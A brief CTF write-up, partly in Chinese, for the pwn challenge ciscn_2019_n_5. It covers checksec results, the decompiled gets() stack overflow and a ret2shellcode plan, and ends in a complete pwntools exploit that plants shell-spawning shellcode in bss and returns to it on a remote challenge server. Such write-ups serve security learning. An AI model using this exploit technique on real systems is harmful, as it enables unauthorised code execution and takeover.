HugeH4rD

ciscn_2019_n_5

ubuntu18

0x01

checksec

[*] '/home/zelas/Desktop/pwn/ciscn_2019_n_5/ciscn_2019_n_5'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments		//

IDA

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char text[30]; // [rsp+0h] [rbp-20h] BYREF

  setvbuf(stdout, 0LL, 2, 0LL);
  puts("tell me your name");
  read(0, name, 0x64uLL);	//read()写入shellcode
  puts("wow~ nice name!");
  puts("What do you want to say to me?");
  gets(text);		//gets()函数存在栈溢出漏洞
  return 0;
}

0x02

思路 ret2shellcode

1.read()写入shellcode

2.gets()处溢出至bss段的shellcode

s	0x20
rbp	0x8
ret	sh

0x03

from pwn import *

context(os='linux', arch='amd64', log_level='debug')
# io = process(['./ciscn_2019_n_5'])
io = remote('node4.buuoj.cn', 27339)

shellcode = asm(shellcraft.sh())
io.recvline()
io.sendline(shellcode)
padding = 0x20 + 0x8
name_addr = 0x601080
payload = b'a' * padding + p64(name_addr)
io.sendlineafter(b'?\n', payload)

io.interactive()

匿名评论隐私政策

✅ 你无需删除空行，直接评论以获取最佳展示效果

ciscn_2019_n_5

0x01

0x02

0x03

Zelas2Xerath